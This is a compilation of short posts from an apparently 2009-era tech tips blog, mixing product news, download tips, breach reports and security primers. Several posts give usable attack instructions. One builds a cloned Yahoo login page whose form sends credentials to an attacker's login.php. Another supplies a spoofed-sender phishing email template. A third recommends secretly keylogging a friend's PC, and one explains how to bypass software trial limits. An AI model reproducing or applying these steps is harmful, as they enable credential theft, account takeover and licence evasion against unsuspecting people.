Bing is the name of Microsoft’s new search engine that expected to go live sometime next week. You can find overview documents and screenshot images of Bing here while of video tour of the Bing.com service is available here.

You probably didn't wake up today expecting an entirely new search experience.

But — Bing! — here it is.

So, why a new search engine? Why the new name? Why now?

Well, because even though search is a pretty amazing thing, the current state of search engines has some equally amazing statistics.

So far in 2009, there are four and a half websites created EVERY SECOND as the web continues to expand. While more searchable information is cool, nearly half of all searches don’t result in the answer that people are seeking.

At the same time, the way the world searches is changing. You want more than just information. You want knowledge that leads to action.

The truth is you've evolved. It's time search caught up.

So we had an idea. Start over. And we did.

We took a new approach to go beyond search to build what we call a decision engine. With a powerful set of intuitive tools on top of a world class search service, Bing will help you make smarter, faster decisions. We included features that deliver the best results, presented in a more organized way to simplify key tasks and help you make important decisions faster.

And features like cashback, where we actually give you money back on great products, and Price Predictor, which actually tells you when to buy an airline ticket in order to help get you the best price — help you make smarter decisions, and put money back in your pocket.

We sincerely hope that the next time you need to make an important decision, you'll Bing and decide.

Thank you,

Bing Team, Microsoft

Read More

Send Ad Free SMS with your own Name as sender

Today, I got to know about a great service which lets you to Send Free SMS over 10 countries<. You don’t need to sign up. Your SMS will arrive guaranteed and there are no annoying ads also. The message can have upto 160 characters.



Cool Features:

• Free SMS


• No sign up required


• Messaging to 10 countries, including India


• Ad free messaging


• Display your own number in the sender


• Secured by Captcha

Read More

Hackers Temporarily Seize Control Of Google Morocco Domain Name

Google.co.ma, the domain name for Google Morocco’s search portal, was taken hostage by hackers earlier today reportedly for several hours before the problem got fixed (it’s working fine again now). We got a bunch of tips about it, and the situation lasted long enough for lots of people to take screenshots of the website the domain name briefly pointed to due to the hack.

You can find loads of screenshots here  and here , but the main domain name pointed to the website shown on top of this post.

There’s a bit of confusion about how the hack was performed exactly, but it appears as if the hackers found a way into NIC.ma , which controls the DNS for the country, and targeted the Google domain name especially. The domain was pointed to a different server, and the web page above was shown when people tried to access the search engine. Google apparently at one point automatically relayed visitors from Morocco to Google.com instead of Google.co.ma, but it took a while to get the latter functioning correctly again.

PAKbugs.com leads to a forum where Pakistan hackers hang out, and the names on top of the web page above are all members of the message board. They’re being proud of it here

This website (in French) claims that this isn’t the first such incident this year, as apparently the websites for Google Algeri and Google Puerto Rico were taken hostage by hackers last month too.

Read More

Download Music From Last.FM

You can listen to Last.FM on your iPhone, G1 and your PC/Mac but you can’t have mp3 files. With Last.Fm Downloader you can! It’s free and has no spyware, viruses.





FYI:

Last.FM downloader is pretty much illegal to own because you are downloading songs that are copyright material, but I am sure you have P2P software such as LimeWire, Strong DC++, Kazaa etc…

Use it at your own risk.

Currently this is only supported in Windows.

Thanks for the Link:NirmalTV

Read More

How To Download YouTube Videos or Convert To Mp3 3gp Mp4 Etc

These few websites will provide you great tools to download youtube videos or convert them into Mp3, Avi, 3GP or Mp4 for iPhone,  iPod .

1.KeepVid - Easy to use and they also have toolbar for easy youtube video download.

2. WikiHow - Few methods that will give you enough info on how to download videos to iPod

3. Vixy - Best tool out there! Allows you to convert flv files online into mp3 or any other file you can think of!!

Read More

How to Use MSN Web Messenger with Hotmail Account

MSN Web Messenger is as of today Integrated with your HotMail account. You can basicaly use web msn messenger and talk to others while composing new email.

To message someone go to contacts, click on the person you would like to talk to and click on “Send an Instant Message (Available).

Or better yet, sign up with Gmail

Read More

Download and Sync YouTube Videos to iPod or iPhone

Here are some basic step by step guides that will show you how to download youtube videos to iPhone or iPod.

Best way to get FLV file from Youtube and convert for iPod or iPhone is via vixy.net. Works for Mac and Windows users.

Windows users can use AVS Video Converter that lets you convert FLV files to any file you can think of and it’s free too (see AVS4You)

Hope this short tutorial helps you get all the youtube videos you want on your iPhone or iPod Touch in our case.

Read More

How to Save Web Pages and Blogs for Offline Reading

Store Web Pages for Offline Viewing

If you have Google Desktop running in the background, you already have a local copy of all web pages that you have recently opened / read in any browser on your computer. You can click "Browse Timeline" inside Google Desktop and your web history will be listed in reverse chronological order - the most recently visited websites will be listed at the top.

The problem with web history in Google Desktop is that it can get cluttered too easily and finding relevant pages from the history may require some effort.  In that case you may install Scrapbook for Firefox and only save relevant web pages that you intend to read in an offline environment.

Scrabbook, like Google Notebook, is primarily for organizing web research but it’s an excellent offline browser as well. You can specify the depth level and all target links from the current web page (up to that level) will be saved offline automatically. For instance, you want to read all stories on the CNN and BBC website offline. Capture the home page with Scrapbook and set the depth as 1 - it will then save full text of all the front page stories as well.

Scrapbook can export all the web captures as an HTML web page so you can easily read the saved content on a mobile phone or your PDA. Another popular tool for downloading web pages in Firefox is DownloadThemAll.

The limitation with either of the above tools is that they work only in Firefox and also require some manual work. What if you want to read all front stories from all major news websites while offline? All news sites provide RSS feeds but they aren’t full text so you have no option but to scrap content from the main website in order to read it offline.

HTTrack is a free website copying software where you can create download jobs and execute them whenever you go online. For example you can create a single download job for all news websites (like BBC, NYT, etc.), set the depth limit as 1 and get an offline version all the front news stories in one go. You can also save this job and re-execute it anytime later either manually or set it up as a scheduled task.

Another good alternative to HTTrack is wget available for Mac, Windows and Linux. You don’t have to spend time learning the complicated command line switches of wget as there are nice GUI apps available both for Mac (CocoaWget) and Windows (WinWget).

Download Blogs for Offline Reading

Blogs, or websites that offers RSS feeds, are much easy to handle and save because we know exactly what stuff has changed since we last visited that site.

There are two categories of blog readers - (a) Addicts or people who are subscribed to several hundred feeds and want to read them all while offline and (b) Casual Readers or people who follow only a dozen or so feeds.

Casual readers can simply add their favorites feeds to Tabbloid and download them all as a PDF newsletter (example).

For people who fall in the category of addicts, the solution that will work best is a dedicated offline reader that can pre-fetch all the new articles and here are some good choices:

My first recommendation has always been FeedDemon - it’s fast, rich in features and the upcoming v2.8 is even better since it lets you export unread items as an HTML web page that can be read on any device.

If you are subscribed to feeds in Google Reader, you can either try RSS Bandit or  Scoop - these are desktop based readers that work in offline mode and can synchronize with your Google Reader subscriptions. If you are on Bloglines, a similar solution for you exists in the form of GreatNews - a desktop RSS reader that is also portable. Google Gears is another solution for Google Reader users but it has limitations.

The advantage with either of the above solutions is that they all support synchronization - so if you mark an item as read in an offline environment, the change will get propagated when you go online next so there’s no double work.

Saving Blogs & Web Pages for Mobile Phones

If you plan to save web pages for offline viewing on a mobile device (with a small screen), I would recommend Web2Book - it not only downloads multiple web pages and blogs in one go but also converts them into formats like HTML or PDF that are supported on almost every mobile device.

Web pages saved with Web2Book can be easily read on ebook devices like the Microsoft Reader or the new Sony Reader. Another option for mobile devices is Plucker - it’s an offline browser available both for Windows Mobile and Palm based PDAs.

If you are an iPod owner (the old models, not the latest iPod touch), you can even turn your MP3 player into a notes reader and read web pages as plain text.

Drawloop, an online service that I mentioned in the previous Adobe PDF guide,  too can join multiple web pages and save them in a single PDF file like in this example where you have the home pages of three news websites saved in a single file.

source:labnol

Read More

Creates Auto-Starting Installer CDs for Any Applications

Windows only: Free app Install-It puts a small auto-starting application on any removable drive that makes installing applications a double-click affair.

After downloading the Install-It package, you'll want to extract its files to somewhere you can reach, like your desktop, and open up the Install.ini file in your favorite text editor. This file is simply a list of program descriptions and the locations of their installer files. If you're creating a disc full of useful installers, just replace the default examples with your chosen verbiage for each app and the location/names of the setup files. You separate those two items with a comma, using slashes where necessary, and end each line with a semi-colon.

Here's an example Install.ini I made for a supposed Windows XP re-installation:



Copy all your installer files and Install-It's files into a CD-burning app, such as CDBurnerXP, and fire away.

Now you've got a CD that, on most computers, will pop up with a list of programs that can be installed without anyone having to guess which icon or cryptic filename means. If a computer isn't set to auto-start when it detects an autorun.inf file, though, you'll have to point the computer to install.exe—not a problem, though, if you've put each application in its own directory.

Install-It is a free download for Windows systems only.

Install-It [via The Red Ferret Journal

Read More

How To Identify Fonts Being Used In Images

Have you ever encountered problems in identifying what fonts is being used in an image? Of course fonts being used in popular movie banners can be found easily because you have the keyword but what if you found a free template and the font is not included? You either recreate the buttons with your own fonts replacing the original, or try posting in forums and hope that someone would have seen that font before and let you know what is the font name. There are so many fonts, maybe hundred of thousands fonts available on the internet and to identify an unknown font is definitely NOT an easy task!

If you need to identify a font, don’t despair. I have found 2 methods that is able to help you identify an unknown font. If it is not able to help you identify the font, it will at least help you narrow down to the closest ones.



Identifont, a free service offered to help you identify fonts by answering a series of simple questions about its appearance.

 

[ Identify Unknown Fonts with Identifont ]

 

Images can be color or black & white, and they don’t have to be very high quality (although that helps). Even a digital photograph of some lettering you like can be accepted. Accuracy of results is unprecedented by previous automatic systems. [ Identify Unknown Fonts with WhatTheFont ]

Finally, if WhatTheFont system is unable to give you a good match of the font you’re looking for, you can then submit your image to WhatTheFont Forum to have your image viewed by font geeks the world over.

Read More

3 Ways a Twitter Hack

Just days after popular social networking tool Twitter was hit was a phishing scam, the company is now trying to clean up a mess surrounding a separate hacking attack.

Over the weekend, some Twitter users received scam tweets, or direct messages, to visit certain sites or blogs. The URL in the message redirected users to a bogus login page in an attempt to steal login credentials for a phishing scheme. Monday, thing got worse as Twitter officials revealed several high profile accounts, such as those of Britney Spears and Barack Obama were hacked.



"It appears someone gained access to the tools Twitter uses to control its millions of accounts," explained Graham Cluley, a senior technology consultant at security firm Sophos PLC. "Internal tools used by the tech support team were compromised. It's not clear if it was an inside job, or outside hacker. Twitter does say they think it was an individual."

The hack, according to Cluley, is much more serious than the earlier phishing attack because it was compromise of the system that potentially exposed all Twitter users to the following dangers.



Fraudalent password use If you gain access to someone's Twitter account, you might be able to gain access to their password, said Cluley.

"We know that 41 percent of people admit to using the same password on every web site and account that they access," he said.

Hackers, while gaining access to something seemingly simply like a username and password to one account may very well be able to use the information to gain access to more important information, such as your bank account.

Malware Infection Twitter officials said 33 accounts had been attacked in the latest hack, including high-profile users such as Britney Spears and Barack Obama. The hackers used their temporary access to send offensive messages. CNN journalist Rick Sanchez found his account had been hacked with a message that read "i am high on crack right now might not be coming to work today."

The damage could have been much worse, said Cluley, if the hacker had decided to take a different approach.

"Imagine if instead, in the case of Britney Spears account for example, that the hacker had posted a link that said: 'Here's my new video. Click on this link.' Imagine how many people would have clicked on that and it could have pointed to malware? And Barack Obama is one of the most followed people on Twitter. If he said: 'I've just made a new speech. Check it out.' a lot of people would click on that link and get infected."



source:network world

Read More

Hacker opens gaping holes in CSAT score security

As the investigation into the leak of college entrance exam results rolls on, prosecutors said yesterday that the computer server at the Korea Institute for Curriculum and Evaluation, which administers the exam, had been hacked over 200 times. Not only the test results but also the institute’s internal information was stolen.



According to prosecution and police sources, a manager at a public relations firm called Inuni Co. whose surname is Kim accessed the institute’s server over 200 times between August 2007 and December 2008.



A detention warrant was filed against Kim on charges of breaking information and network laws but it was rejected by the court.



Kim easily broke into the server. In August 2007, he accessed an employee’s e-mail account at the institute. Kim obtained the e-mail ID from a press release, and the password was the same as the ID.



Kim tried to log in to e-mail accounts of other institute employees over 50 times. One of his successes was with the account of someone in the institute’s administrative office. The employee used a password identical to the romanized spelling of his name.



One of the employee’s e-mails contained an attached file containing the passwords of five other employees at the institute. The employee temporarily managed the other employees’ e-mail access information because he dealt with changes in the institute’s server. Their passwords were identical to the last seven digits of their residential identification numbers.



In this way, Kim downloaded 16 types of internal information from the institute. Among the materials downloaded were plans to grade answer sheets from the 2009 College Scholastic Ability Test, scoring schedules and the number of students who missed the test.



“Kim could look at the Korea Institute for Curriculum and Evaluation’s internal information by accessing the e-mail of seven employees,” a prosecutor said.



Kim passed the information on to VisangEdu, a private education company. VisangEdu made the CSAT score analysis public on Dec. 9, a day before the CSAT results were announced.



Kim accessed the institute’s server four times on Dec. 10 after the institute requested a probe into this case.



As the investigation closed in on him, Kim destroyed a memo containing the IDs and passwords of the seven employees. Prosecutors plan to decide what kinds of charges they will file against Kim and a VisangEdu director whose surname is Jin this week.

Read More

Get things Insurance

This is a world of uncertainties and no one can guess what may happen the next moment. To be frank you should not thing that is a way of looking things from a negative point of view. This is a step for being cautious. For instance you might have put in a good part of your savings and bought your dream car. It is also very important to get a car insurance as it will help you get a cover and get reimbursements in case some unforeseen things happen. If you are looking to get a cheap car insurance then Maczoop is he perfect destination for you. The site helps you to get various quotes, compare and contrast and then choose the best one which will fit in your requirements. They have also got some valuable information and tips on auto insurance and this will be very helpful when you are going to take one. Get things insured and stay secure!

Read More

Dissecting iMobile - Security Analysis of ICICI Mobile Banking App

ICICI Bank’s iMobile website has some of the worst server side validations ever, which is what prompted me to download the mobile app’s JAR file, study it in detail and write this post. According to the website, until the Reserve Bank of India comes out with mobile banking guidelines and approves it, mobile banking is supposed to be halted. Technically, it means that, all existing users shouldn’t be able to use the service what-so-ever and new user signups should be prevented & a notification stating that they should retry later should be shown.

Therefore, in this scenario, I shouldn’t have been able to download the app to my mobile device. The website of ICICI fails in not enforcing this by providing the following ways:
Existing users who have already installed the app are given an option to ‘Upgrade’ from within the mobile app itself. This opens up a webpage in the phone’s native browser, whose URL is http://mobile.icicibank.com/upgrade?version=null.
The actual iMobile website has some stupid javascript validation, which is very easy to bypass using modern browsers. Heck, just by browsing the HTML source code of the page, you will be able to easily find the URL for the application JAR files. Put 2 and 2 together and you will be able to download the app.

Which brings me to explain Step 2 in detail:
On any browser, go to View->Source. This will display the source code of the rendered HTML page. Notice the first It contains many functions & the most important functions to us are “submitForm” and “displayOption”. The line of interest in submitForm method is document.jump1.action="https://infinity.icicibank.co.in/web/apps/"+fileName;. That line pretty much gives away everything. All you have to do is, navigate to the above mentioned URL and append a filename to it for download.

What filename do you have to give and How?
That’s where our displayOption function is very useful. That function contains a set of simple If-Else conditional statements, which have the respective filenames. For e.g. if you want to download “M20P1520ALL1.jar”, then just append it to the URL & access it using the address bar. Therefore, the URL becomes https://infinity.icicibank.co.in/web/apps/M20P1520ALL1.jar Being a JAR file, most browsers will display a “Save As” dialog box. Now, just download the file and transfer it to your mobile. The application is fairly straight forward.

Where ICICI Bank failed?
They should have disabled the link mentioned in #1 above and replaced it with some text that says, “RBI mobile banking guidelines blah blah…”. But some clever users will bookmark the link to the JAR file and try to access the JAR file by bypassing the link itself. When they do that, the web server should return a “404 - Resource Not Found” error. Got it? Implementing this is pretty simple.
There shouldn’t have been such a lot of useless javascript on the page. Firstly, they should have removed the device selection drop down box. Secondly, they should have replaced this page with an alternative. Thirdly, this mobile banking link should have been removed in the home page itself. Fourthly, they should have validated on the server for JAR file downloads and should have displayed the “404 - Resource Not Found” error page.
Ok. Leave aside #1 and #2. At least the mobile app should have thrown soft errors when users try to access mobile banking from the JavaME app. Any bank would store all activity data for a certain period of time. So when you access the bank’s service from a mobile device, the server software surely knows about it, which means, the server software should have returned errors to the user instead of allowing the user to do transactions.
There’s one more bug in the app itself. When you launch the app, it will prompt you to sync the data on the device to its servers for faster access the next time. When you click “OK” to synchronize, it will wait for a few minutes and show a message as, “There is no data to synchronize”. When you proceed further and try to access your info, it will again prompt you to sync the data. That’s frustrating. Either you should sync the data properly or you should access the server every time over a secure channel. As simple as that. That’s not followed too.
For me, all these things imply only thing. ICICI wants the existing users to continue using the app, thereby disobeying RBI’s orders or they are having some really bad programmers who don’t know the stuff they are doing. At a time when people fear about Google tracking their internet usage, this is MY/YOUR FINANCIAL INFORMATION, which is at risk Right?

That was a long post already We still have some more to go. Lets take a break.

Image Credits

Back? Ok Now, lets dissect the actual JAR file and look into the technical details of its implementation.

The Manifest File:
Rename the .JAR extension to .ZIP extension and extract it to your favourite folder. Open the “META-INF” folder and open the “MANIFEST.MF” file in a text editor. As you will note, it contains lots of very valuable information, especially the socket URLs of various mobile service providers. User agent is also very interesting. When sending HTTP requests through the application, it uses that property for setting the “user-agent” HTTP header. They also have debug strings enabled, which means by snoping around using a good file manager for your mobile, you will be able to get technical errors! thereby, letting us know how the app works itself, what requests it sends, its behaviour etc.

Another important item is, “MIDlet-Name” property in the manifest. This property determines what name the user sees after he installs the app on his mobile. Using the same name, when future upgrades are made available, the app is just replaced in place of the old one, which means, if you modify the “MIDlet-Name” property and install the app again, you will have 2 copies of the same app. THIS SHOULD NEVER BE ALLOWED FOR A HIGHLY CRITICAL FINANCIAL APPLICATION. Isn’t it? As an example, try changing the MIDlet-Name of the Yahoo! Go JAR file and try to install the app again on your mobile. My E51 shows an “Invalid JAR” error message because of MD5 sum checks etc.

Some more Holes:
Now, move back to the folder where the JAR file has been extracted. It contains a bunch of .class files. Pass it through a decompiler. You will get “perfect” java source code files. The code looks obfuscated. But its not obfuscated enough. Anybody will be able to make good sense from the source code. All the URLs, all the used strings and everything else will be clearly visible. By using the app on your mobile side-by-side, you will be easily able to go through the source code. All in all, I wouldn’t use this app anymore until the security measures are tighter.

What should the bank do here?
Shouldn’t allow the installation of 2 apps of the same JAR with different names. Take this example of the Yahoo! Go JAR file.
I guess these mobile providers’ socket URLs are used for a one time basis to send verification SMS. If that be the case, they shouldn’t be present in the manifest file for a variety of reasons that I won’t discuss here.
There’s an interesting property named “WSCDomainName” in the manifest file. I guess it expands to “Web Service Client Domain Name”, though I’m not sure about it. Suggestion: Encrypt the name value pairs.
Most importantly, sign the application using the Java Signed program. C’mon, users are doing financial transactions and a signed app will increase their confidence of using this application.

Suggestion for Users:
Users should install these kinds of apps on their mobile’s inbuilt memory, instead of the memory card. That is, when you connect your phone to the PC in thumb drive mode, all the RMS file stores for the mobile app are clearly visible. There are many decoders available on the internet that can read content from the RMS file stores. When you store this app on your mobile’s inbuilt memory, you can’t read those stores directly and there are a number of checks in place, that prevent reading it.

Thats about it !

Of course, this blog post can’t be termed as a full fledged security analysis. But most of what has been ignored by the bank are mere basics. They must have more secure systems in place.

Read More

How to open mobile websites on your PC browser

There are a number of use-cases for which you would want to browse a mobile-optimized website on your PC. When you visit the mobile website on your PC’s web browser, the website displays the full content much to your dismay. However, when you visit the browser on a mobile, it displays a perfectly mobile optimized page.

In these cases, there are some simple steps that you can follow to open mobile websites on your PC:

1. Download and install the latest version Firefox from http://www.getfirefox.com/.


2. Visit Firefox Add-ons page and download the Modify Headers addon.


3. Install the addon and restart firefox.


4. From the firefox window, select “Tools” menu & click on “Modify Headers” option (Tools -> Modify Headers).


5. The window will open as shown:
   
   Click to enlarge


6. Below the title bar, there’s a drop down. Select “Add” from the drop down box.


7. Now in the text box next to the drop down, type “user-agent”.


8. In the third text box, paste this string - Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE51-1/100.34.20; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413.


9. Click on “Save”.


10. The screen should look like as shown in the screen shot below:
    
    Click to enlarge


11. Using the buttons on the Modify Headers addon window, you can enable or disable particular items.


12. That’s it! Whenever you want to view a mobile website, just go to Tools->Modify Headers and enable the user agent you added in step 8. When you don’t need it, just open this window and disable it.


13. You can close addon window after you have enabled/disabled items.


14. Enjoy!

Read More

Hacking a MySpace Account

MySpace is one of the most widely used Social Networking website by many teenagers and adults across the globe.If you’re curious about hacking a MySpace Account or preventing your MySpace account from being hacked, then this post is for you.

Here are some of the ways of hacking a MySpace account.

Phishing

Phishing is the most commonly used method to hack MySpace or any other email accounts.The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages.These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc.But once the user attempts to login through these pages, his/her login details are stolen away.

Phishing is proved to be the most effective way of hacking passwords and also has high success rate.The reason for this is quite simple.The users are not aware of the phishing attack.Also the users are fooled, since the fake login pages imitate the appearance of the original pages.So, you may use the phishing technique to hack your friend’s MySpace account (just for fun).

A detailed tutorial on phishing is discussed in the following two posts.

Hack Yahoo, Gmail or any other Password.
How to Create a Fake Login Page?

Spywares

The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habits, sites that have been visited, passwords and other sensitive information.

Keyloggers are the most widely used program, which are nothing but spywares.If you want to hack your friend’s Myspace password, then all you have to do is just install a keylogger on your friend’s PC.Hacking a MySpace account using a keylogger is very easy, but also has some limitations.

For more information on keyloggers and their usage, refer the following post

Hacking an Email Account

Hacking Services

In most cases, hacking services are scams. Always ask for proof first before paying anything.I have tried many such hacking services(just to test them), but none of them have responded back.So personally I do not trust such services.

Please pass your comments and opinions….

Read More

How to Completely Erase a Hard Disk Drive

A new year has begun and perhaps you have decided to perform a system upgrade or get rid of your old computer system and purchase a new one.But before you sell or donate your old computer, it is very much necessary to completely erase your Hard Disk Drive.Yes, every one of us are aware of this fact and so, we delete the contents of the hard disk either by using the DELETE key on our keyboard or by Formatting the hard disk.

Deleting and Formatting - Just Not Secure Enough

But the fact is, the data will still be on the hard disk even after deleting it or formatting the hard disk. Using the delete key on your keyboard will only remove the shortcuts to the files making them invisible to users. Deleted files still reside on the hard drive and a quick Google search will show many options for system recovery software will allow anyone to reinstate that data.

Formatting the hard drive is a bit more secure way to erase the hard disk. Formatting a disk will not erase the data on the disk, only the address tables. It makes it much more difficult to recover the files. However a computer specialist would be able to recover most or all the data that was on the disk before the reformat. For those who accidentally reformat a hard disk, being able to recover most or all the data that was on the disk is a good thing. However, if you’re preparing a system for retirement to charity or any other organization, this obviously makes you more vulnerable to data theft.

Erasing the Hard Disk through DISK WIPING

So it is necessary for us to use a 100% secure way to erase the hard disk.The secure way of erasing the hard disk is called Disk Wiping.Disk wiping is a secure method of ensuring that data, including company and individually licensed software on your computer and storage devices is irrecoverably deleted before recycling or donating the equipment. Because previously stored data can be brought back with the right software and applications, the disk wiping process will actually overwrite your entire hard drive with data, several times. Once you format you’ll find it all but impossible to retrieve the data which was on the drive before the overwrite. The more times the disk is overwritten and formatted the more secure the disk wipe is.

There are a variety of disk wiping products available that you can purchase, or freely downloaded online to perform more secure disk wipes.One of my favorite disk wiping software is

WipeDrive/ WipeDrive Professional

You have to use this tool by burning the iso image file onto a CD or by using a floppy disk.After burning this tool you have to boot your PC and follow the screen instructions to completely erase the hard disk.

Read More

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever.Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period.Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.

When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.

2. Once the trial period expires, you must always run the software using RunAsDate.

3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.

4. It is better and safe to inject the date of the last day in the trial period.

For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.

I hope this helps! Please express your experience and opinions through comments.

Read More

Get a Call from your own Cell Phone number

Here is a trick to get a call to your cell phone from your own number.Do you think I am crazy? No, I am not…….

Just try the following steps and you’ll get a call to your cell phone from your own number.

 

1. Just give a missed call to this number.You’ll not be charged!

+41445804650

2. Wait for a few seconds and you’ll get a call to your cell phone from your own number

3. Receive the call.You’ll hear a lady voice asking for a PIN number.Just enter some rubbish number.

4. She say’s- Your PIN cannot be processed and the call disconnects..

ANOTHER TRICK

Instead of giving a missed call, just continue calling.The call will not be received and will get disconnected just after a while.But now do you know what happen’s?

You will get a call from the number

+501

Reason behind this trick

God Knows!!

Just try and pass your comments. Tell me whether the second trick worked or not!!

Read More

How to Create a Fake Login Page?

In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

 

Here is a step-by-step procedure to create a fake login page.

1. Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

 2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)

3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif“

Rename the above link into

 

src=”files/ma_mail_1.gif“

Repeat the same procedure for every file contained in the Folder.

 

6. Now search for the following term

 

action=

 

you will see something like this

 

action=https://login.yahoo.com/config/login?

Edit this to

 

action=http://yoursite.com/login.php

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/

7. Now you have to upload your yahoo.HTML, files folder and login.php to

 

NOTE: Make sure that your host supports PHP

8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside

The details of hacking an email, using a Fake login page is discussed in detail in my new post  Hack Yahoo, Gmail or any other Password

Read More

Hack Yahoo, Gmail or any Email Password

Today I will show you how to Hack Yahoo, Gmail or any other email Password.I have already shown some of the easiest ways to Hack Yahoo in my previous post Hacking an email account.So, you may wonder what’s special about this post.Here in this post I will show all of you the real way to Hack Yahoo and other passwords.This method to hack passwords is same as the one used by many professional hackers.

NOTE:THIS TUTORIAL IS MEANT FOR EDUCATIONAL PURPOSE ONLY.I AM NOT RESPONSIBLE FOR ANY KIND OF MISUSE. 

 

STEPS TO BE CARRIED OUT BEFORE YOU HACK YAHOO 

Let’s see how to hack Yahoo in particular.Before we hack the password, we have to understand how to exploit the major vulnerabilities in Yahoo.During the sign up process, it allows your First name or the Last name to contain the Word Yahoo .Is this not a major flaw? Yes, because you can choose the first name as Yahoo Account and last name as Update.So, when you send an email from this Yahoo account, it appears to have come from

Yahoo Account Update (Yahoo Accounts Team)

So, this helps us to make the victims believe that this is an email from Yahoo Accounts Team.

So What’s Next?

CREATING A NEW ACCOUNT

Before you hack Yahoo, you need to create a new account as given below

1. Choose the first name as YAHOO ACCOUNT and last name as UPDATE.

2. Select an email ID something like this

update_account@yahoo.com

update08_account@yahoo.com

accountupdate09@yahoo.com  etc.

I think you got the idea.

3. Always select @yahoo.com not yahoo.co.uk or yahoo.co.in.

Now you are all set to hack the password.

USING A FAKE LOGIN PAGE TO HACK YAHOO

We have to hack yahoo using a fake login page.Hacking Yahoo using a Fake login page has more success rate than any other method.In fact, this is the real procedure adopted by many hackers to hack an email password.

The step-by-step procedure to create a fake login page is explained in my post How to create a fake login page

After you have setup your new Yahoo account and the fake login page, it’s just  a cakewalk to hack the password.All you have to do is just send an email from your fake Yahoo account to the victim’s ID saying that

————————————————————————————

Dear <Victim Name> or Yahoo subscriber,

It is highly recommended that you update your account immediately as per the new policy adopted by Yahoo.Blah blah…

Click Here to update your account.

Thanks,

The Yahoo accounts team

————————————————————————————

Remember to link your Fake login page to the text Click Here.Once the victim enters the password in the fake login page, you have successfully hacked the Yahoo password.The above procedure can also be used to hack Gmail and other email passwords.

You can see the DEMO of fake login page that I have created HERE.

Please pass your comments and opinions.

Read More

Denial Of Service Attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

What is a Denial Of Service Attack?

 

• A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.


• If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:

• bandwidth attacks,


• protocol attacks, and


• logic attacks
  
  

What is Distributed Denial of Service Attack?

• An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.


• This makes it difficult to detect because attacks originate from several IP addresses.


• If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Read More

Trojans and Backdoors

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

• It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.


• Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

 

• Attacker gets access to the trojaned system as the system goes online


• By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

• Remote Access Trojans


• Password Sending Trojans


• Keyloggers


• Destructive


• Denial Of Service (DoS) Attack Trojans


• Proxy/Wingate Trojans


• FTP Trojans


• Software Detection Killers

Modes of Transmission

• Attachments


• Physical Access


• Browser And E-mail Software Bugs


• NetBIOS (File Sharing)


• Fake Programs


• Un-trusted Sites And Freeware Software

Backdoor Countermeasures

• Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)


• An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.


